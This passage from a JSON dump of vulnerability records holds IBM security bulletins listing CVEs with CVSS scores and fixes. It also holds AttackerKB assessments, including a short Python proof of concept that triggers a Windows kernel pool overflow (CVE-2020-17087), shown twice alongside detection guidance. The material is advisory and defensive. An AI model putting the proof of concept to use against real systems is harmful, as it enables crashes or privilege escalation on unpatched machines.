(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-15999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) \n** DESCRIPTION: **Google Chrome is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by Freetype. By persuading a victim to visit a specially crafted Web site, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/190226](<https://exchange.xforce.ibmcloud.com/vulnerabilities/190226>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-12652](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12652>) \n** DESCRIPTION: **An unspecified error with improper validation of length of chunks against the user limit in libpng has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/163589](<https://exchange.xforce.ibmcloud.com/vulnerabilities/163589>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nISPIM| 2.1.1 \n \n\n\n## Remediation/Fixes\n\n \n\n\nAffected Product(s)| Version(s) | Remediation \n---|---|--- \nISPIM| 2.1.1| [2.1.1-ISS-ISPIM-VA-FP0007](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Tivoli/IBM+Security+Privileged+Identity+Manager&release=2.1.1&platform=All&function=fixId&fixids=2.1.1-ISS-ISPIM-VA-FP0007&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&login=true> \"2.1.1-ISS-ISPIM-VA-FP0006\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n11 Aug 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRQBP\",\"label\":\"IBM Security Privileged Identity Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T07:01:26", "type": "ibm", "title": "Security Bulletin: IBM Security Privileged Identity Manager is affected by security vulnerabilities (CVE-2020-1971, CVE-2020-15999, CVE-2017-12652)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12652", "CVE-2020-15999", "CVE-2020-1971"], "modified": "2021-08-16T07:01:26", "id": "979C1C302656B100A9230D67DC5FDA9D31E695FEDE62BEA27566840475B31B1B", "href": "https://www.ibm.com/support/pages/node/6481629", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-01T01:56:48", "description": "## Summary\n\nSynthetic Playback Agent has addressed the following vulnerabilities: CVE-2020-26951, CVE-2020-16012, CVE-2020-26953, CVE-2020-26956, CVE-2020-26958, CVE-2020-26959, CVE-2020-26960, CVE-2020-15999, CVE-2020-26961, CVE-2020-26965, CVE-2020-26966, CVE-2020-26968\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-26968](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26968>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by memory safety bugs within the browser engine. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191917](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191917>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-16012](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16012>) \n** DESCRIPTION: **Google Chrome could allow a remote attacker to obtain sensitive information, caused by a side-channel information leakage in graphics. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191856](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191856>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-26951](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26951>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to bypass security restrictions, caused by a parsing and event loading mismatch in Firefox's SVG code. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to bypass security sanitizer for chrome privileged code. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191918](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191918>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-26953](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26953>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to bypass security restrictions, caused by the ability to enter fullscreen mode without displaying the security UI. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to attempt a phishing attack or otherwise confuse the user. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191920](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191920>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-26966](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26966>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to obtain sensitive information, caused by the broadcasting of single-word queries to a local network. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191936](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191936>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-26956](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26956>) \n** DESCRIPTION: **Mozilla Firefox is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when removing HTML elements. A remote attacker could exploit this vulnerability using paste (manual and clipboard API) in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191923](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191923>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-26959](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26959>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free in WebRequestService. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191926](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191926>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-26958](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26958>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to bypass security restrictions, caused by the failure to block execution of scripts with incorrect MIME types when the response was intercepted and cached through a ServiceWorker. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to cause a cross-site script inclusion vulnerability or a Content Security Policy bypass. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191925](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191925>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-26965](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26965>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to obtain sensitive information, caused by the remembrance of typed passwords by software keyboards. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191935](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191935>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-26961](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26961>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to bypass security restrictions, caused by the failure to filter IPv4 mapped IP Addresses by a DoH resolver. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to lead to a possible DNS rebinding attack. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191931](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191931>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-26960](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26960>) \n** DESCRIPTION: **Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free in uses of nsTArray. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191927](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191927>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nAPM AM| 8.1.4 \nBAM| 1.0 \nAPM SaaS| 8.1.4 \nAPM on-premise| 8.1.4 \nICAM| 2019.3.0 \n \n\n\n## Remediation/Fixes\n\nProduct Remediation| Fix \n---|--- \nAPM on-premise| Synthetic Playback Agent 8.1.4 IF13 \nICAM| ICAM 2020.2.3 \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n24 Nov 2020: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSVJUL\",\"label\":\"IBM Application Performance Management\"},\"Component\":\"Monitoring Agent for Synthetic Playback\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.1.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-25T07:21:06", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 78.5 ESR + CVE-2020-26951) have affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 - 2020.2.0", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2021-02-25T07:21:06", "id": "E58FC3F1E698B87258B01B21FF93EC241CCC5B41ED4495D2B3CC4151FDA89BFA", "href": "https://www.ibm.com/support/pages/node/6417173", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-11-26T11:10:35", "description": "CVE-2020-17087 is a pool-based buffer overflow vulnerability in the Windows Kernel Cryptography Driver (cng.sys). The vulnerability arises from input/output controller (IOCTL) 0x390400 processing and could allow a local attacker to escalate privileges, including for sandbox escape. The vulnerability was initially released as a zero-day by Google\u2019s Project Zero team; it was patched on November 10, 2020, as part of Microsoft\u2019s November 2020 Patch Tuesday release.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at October 30, 2020 9:13pm UTC reported:\n\nAn error exists within `cng!CfgAdtpFormatPropertyBlock` where buffer is allocated from a value that is truncated to be 16-bits. The function then goes on and performs a binary to ASCII hex conversion, writing the ASCII hex characters to this buffer. While performing the conversion, the original buffer\u2019s correct length is used causing the write to continue out of bounds.\n\nThe vector for this vulnerability is local. A malicious attacker would first have to have code execution on the target system from any context including that of a sandboxed application. From there they would open a handle to `\\\\.\\GLOBALROOT\\Device\\Cng` before issuing the 0x390400 IOCTL with a crafted input buffer. The crafted input buffer contains a size parameter as one of the fields that when set to 0x2aab or greater will trigger the overflow.\n\nExploitation of this bug won\u2019t be easy due to it being a heap based memory corruption within the kernel\u2019s NonPagedPool. The attacker has partial control over the size of the allocation as constrained by `((size * 6) & 0xffff)`.\n\nThis vulnerability was originally reported by Google\u2019s Project Zero who also reported that it is being actively exploited in the wild. The original report is on [their tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2104>). The live in the wild exploitation is reportedly targeted and not related to the US elections. A patch is expected to be release on November 10th, 2020.\n\nWhile the vulnerable code appears to be present within Windows 7 SP1 x64 as verified through static analysis. The original PoC provided by Google\u2019s Project Zero team, does not trigger the bug on this platform. Within the callstack the chain is accessible, however a difference within the implementations is causing `cng!BCryptSetContextFunctionProperty` to branch leading to the path to `cng!CfgAdtReportFunctionPropertyModification` being missed.\n\n## Detection\n\nAttempted exploitation of this vulnerability can be detected through auditing event ID [5069](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5069>). This must be configured in order to detect exploitation attempts. To enable it, start `secpol.msc`, then navigate to `Security Settings > Advanced Audit Policy Configuration > System Audit Policies > Policy Change`. Set `Audit Other Policy Change Events` to enable both \u201cSuccess\u201d and \u201cFailure\u201d. With this change in place, event ID 5069 will be loaded to the standard Windows Security Log that is accessible through the event viewer.\n\nExploitation attempts can then be identified through the length of the reported \u201cvalue\u201d field.\n\n![](https://zerosteiner.s3.amazonaws.com/images/cve-2020-17087-event.png)\n\n## Proof of Concept\n\nThe following is a port of the original Proof of Concept released by Google Project Zero into Python and updated to demonstrate the vulnerability on both Windows 7 SP1 and Windows 10.\n \n \n import ctypes\n import random\n \n # https://github.com/zeroSteiner/mayhem\n from mayhem.windll import *\n \n value = (ctypes.c_ubyte * 0x2aab)()\n bcrypt.BCryptSetContextFunctionProperty(\n bcrypt.CRYPT_LOCAL,\n 'Default',\n bcrypt.BCryptInterface.Cipher,\n 'AES',\n \"XXX_{:08x}\".format(random.randint(0, 0xffffffff)),\n len(value),\n value\n )\n \n\nInstead of directly issuing the IOCTL, this variant uses the [`bcrypt!BCryptSetContextFunctionProperty`](<https://docs.microsoft.com/en-us/windows/win32/api/bcrypt/nf-bcrypt-bcryptsetcontextfunctionproperty>) function with the appropriate arguments. Randomizing the `pszProperty` argument helps to ensure that the vulnerability is triggered exactly once each time the code is run.\n\n**lvarela-r7** at November 03, 2020 8:21pm UTC reported:\n\nAn error exists within `cng!CfgAdtpFormatPropertyBlock` where buffer is allocated from a value that is truncated to be 16-bits. The function then goes on and performs a binary to ASCII hex conversion, writing the ASCII hex characters to this buffer. While performing the conversion, the original buffer\u2019s correct length is used causing the write to continue out of bounds.\n\nThe vector for this vulnerability is local. A malicious attacker would first have to have code execution on the target system from any context including that of a sandboxed application. From there they would open a handle to `\\\\.\\GLOBALROOT\\Device\\Cng` before issuing the 0x390400 IOCTL with a crafted input buffer. The crafted input buffer contains a size parameter as one of the fields that when set to 0x2aab or greater will trigger the overflow.\n\nExploitation of this bug won\u2019t be easy due to it being a heap based memory corruption within the kernel\u2019s NonPagedPool. The attacker has partial control over the size of the allocation as constrained by `((size * 6) & 0xffff)`.\n\nThis vulnerability was originally reported by Google\u2019s Project Zero who also reported that it is being actively exploited in the wild. The original report is on [their tracker](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2104>). The live in the wild exploitation is reportedly targeted and not related to the US elections. A patch is expected to be release on November 10th, 2020.\n\nWhile the vulnerable code appears to be present within Windows 7 SP1 x64 as verified through static analysis. The original PoC provided by Google\u2019s Project Zero team, does not trigger the bug on this platform. Within the callstack the chain is accessible, however a difference within the implementations is causing `cng!BCryptSetContextFunctionProperty` to branch leading to the path to `cng!CfgAdtReportFunctionPropertyModification` being missed.\n\n## Detection\n\nAttempted exploitation of this vulnerability can be detected through auditing event ID [5069](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5069>). This must be configured in order to detect exploitation attempts. To enable it, start `secpol.msc`, then navigate to `Security Settings > Advanced Audit Policy Configuration > System Audit Policies > Policy Change`. Set `Audit Other Policy Change Events` to enable both \u201cSuccess\u201d and \u201cFailure\u201d. With this change in place, event ID 5069 will be loaded to the standard Windows Security Log that is accessible through the event viewer.\n\nExploitation attempts can then be identified through the length of the reported \u201cvalue\u201d field.\n\n![](https://zerosteiner.s3.amazonaws.com/images/cve-2020-17087-event.png)\n\n## Proof of Concept\n\nThe following is a port of the original Proof of Concept released by Google Project Zero into Python and updated to demonstrate the vulnerability on both Windows 7 SP1 and Windows 10.\n \n \n import ctypes\n import random\n \n # https://github.com/zeroSteiner/mayhem\n from mayhem.windll import *\n \n value = (ctypes.c_ubyte * 0x2aab)()\n bcrypt.BCryptSetContextFunctionProperty(\n bcrypt.CRYPT_LOCAL,\n 'Default',\n bcrypt.BCryptInterface.Cipher,\n 'AES',\n \"XXX_{:08x}\".format(random.randint(0, 0xffffffff)),\n len(value),\n value\n )\n \n\nInstead of directly issuing the IOCTL, this variant uses the [`bcrypt!BCryptSetContextFunctionProperty`](<https://docs.microsoft.com/en-us/windows/win32/api/bcrypt/nf-bcrypt-bcryptsetcontextfunctionproperty>) function with the appropriate arguments. Randomizing the `pszProperty` argument helps to ensure that the vulnerability is triggered exactly once each time the code is run.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17087 Windows Kernel local privilege escalation 0day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16009", "CVE-2020-17087"], "modified": "2020-11-17T00:00:00", "id": "AKB:B72B19ED-8E0B-4C11-9C2D-95A25BCC42A6", "href": "https://attackerkb.com/topics/y8mmBHc710/cve-2020-17087-windows-kernel-local-privilege-escalation-0day", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-25T11:09:23", "description": "Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**lvarela-r7** at October 22, 2020 5:25pm UTC reported:\n\nGood SECPod blog on the vulnerability, also showing this is being actively exploited. \n[https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/?utm_source=Chrome%20Zero-Day%20October&utm_medium=Email&utm_campaign=Google%20Chrome%20Zero-Day%20October](<https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/?utm_source=Chrome%20Zero-Day%20October&utm_medium=Email&utm_campaign=Google%20Chrome%20Zero-Day%20October>)\n\n**ccondon-r7** at October 20, 2020 11:53pm UTC reported:\n\nGood SECPod blog on the vulnerability, also showing this is being actively exploited. \n[https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/?utm_source=Chrome%20Zero-Day%20October&utm_medium=Email&utm_campaign=Google%20Chrome%20Zero-Day%20October](<https://www.secpod.com/blog/chrome-zero-day-under-active-exploitation-patch-now/?utm_source=Chrome%20Zero-Day%20October&utm_medium=Email&utm_campaign=Google%20Chrome%20Zero-Day%20October>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T00:00:00", "type": "attackerkb", "title": "CVE-2020-15999 Chrome Freetype 0day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2020-16009", "CVE-2020-17087"], "modified": "2020-11-05T00:00:00", "id": "AKB:C6F99915-AA1F-419E-A866-FCD1140D6667", "href": "https://attackerkb.com/topics/CqH1gMBHJC/cve-2020-15999-chrome-freetype-0day", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-27T17:13:40", "description": "Inappropriate implementation in V8 in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**kreavis-r7** at November 03, 2020 7:12pm UTC reported:\n\nGoogle confirmed reports that an exploit for CVE-2020-16009 exists in the wild: \n<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-03T00:00:00", "type": "attackerkb", "title": "CVE-2020-16009", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16009"], "modified": "2020-11-13T00:00:00", "id": "AKB:F497A3EB-F6FD-4D35-AD28-AD914147A8B3", "href": "https://attackerkb.com/topics/sE6Jzs2ATK/cve-2020-16009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:47", "description": 